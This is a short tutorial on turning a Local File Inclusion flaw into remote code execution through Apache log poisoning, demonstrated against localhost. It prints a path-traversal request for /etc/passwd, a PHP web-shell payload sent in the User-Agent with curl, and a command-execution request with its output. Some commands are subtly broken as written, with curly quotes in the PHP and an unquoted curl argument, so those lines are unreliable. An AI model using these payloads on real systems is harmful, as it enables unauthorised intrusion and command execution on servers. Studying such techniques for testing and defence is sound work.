Introduction
LFI (Local File Inclusion) is a common vulnerability found in web applications, allowing an attacker to include local files in the server. LFI Log Poisoning is a technique that leverages LFI vulnerabilities to write arbitrary content to log files on the server. By doing so, an attacker can leverage a LFI to a RCE.
This is the path of a vulnerable LFI :
http://127.0.0.1/index.php?page=/../../../../etc/passwd
The local file can be read :
root:x:0:0:root:/root:/usr/bin/zsh
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
Demonstration
An attacker is now able to include a log file in a URL parameter and then inject malicious code into that log file. When the web application reads the log file, it will execute the malicious code and potentially grant the attacker access to sensitive information or the ability to execute arbitrary commands on the server.
To perform LFI Log Poisoning, we need to inject code into a log file on the server. In this case, we will use the access.log
file located in the /var/log/apache2/
directory.
http://127.0.0.1/index.php?page=/../../../../var/log/apache2/access.log
127.0.0.1 - - [05/Apr/2023:10:31:22 -0400] "GET /index.html HTTP/1.1" 200 1248 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
127.0.0.1 - - [05/Apr/2023:10:31:22 -0400] "GET /images/logo.png HTTP/1.1" 304 - "https://example.com/" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
127.0.0.1 - - [05/Apr/2023:10:31:24 -0400] "POST /login.php HTTP/1.1" 200 1532 "https://example.com/login.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
192.168.0.10 - - [05/Apr/2023:11:12:45 -0400] "GET /admin.php HTTP/1.1" 401 381 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
192.168.0.10 - admin [05/Apr/2023:11:13:08 -0400] "GET /admin.php HTTP/1.1" 200 2196 "https://example.com/admin.php" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.96 Safari/537.36"
In this case, we can try to change the user-agent
to our payload to execute a malicious code.
Let’s generate a cmd
parameter.
<?php system($_GET[‘cmd’]); ?>
Modify the user-agent
request with curl
with option -A
curl http://127.0.0.1/ -A <?php system($_GET[‘cmd’]); ?>
So now we can use the cmd
parameter to inject a command. Let’s use whoami
and see what’s happen.
curl http://127.0.0.1/index.php?page=/../../../../var/log/apache2/access.log&cmd=whoami
It’s works.
www-data